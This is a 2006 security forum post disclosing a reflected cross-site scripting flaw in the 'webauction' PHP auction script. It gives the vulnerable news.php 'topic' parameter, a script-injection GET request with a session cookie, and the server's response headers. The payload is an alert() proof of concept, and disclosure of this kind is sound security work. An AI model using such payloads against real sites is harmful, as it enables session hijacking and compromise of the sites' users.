|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 151
Members: 0
Total: 151
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
XSS webauction |
|
Posted: Thu Mar 23, 2006 6:50 pm |
|
|
Classics |
Regular user |
|
|
Joined: Mar 23, 2006 |
Posts: 6 |
Location: Nederland/Venlo |
|
|
|
|
|
|
Code: |
webauction <== Cross-Site Scripting Vulnerability
===================================
Information of Software:
Software: webauction
Site: box.s-w-web.net
Description: webauction is a simple Auction Script.
Risk: medium
===================================
Bug:
1) Cross-Site Scripting Vulnearbility in the page news.php
The vulnerability is found in news , views method.
- HTTP Normal GET Request
http://[target]/[patch]/news.php
GET /[patch]/news.php HTTP/1.0
GET /webauction/news.php?topic=<script>var%20Classics=688625517;alert(Classics);</script> HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: box.s-w-web.net
Cookie: YA_SESSION_ID=72b28500516a05806562d9cc8a6acd2b
Connection: Close
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2006 18:25:29 GMT
Server: Apache/1.3.34 (Unix) PHP/4.4.1
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
---------------------------------------------------------
Credit:
Author: Classics
greetz: all DTO and FD-Crew Leader
===================================
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|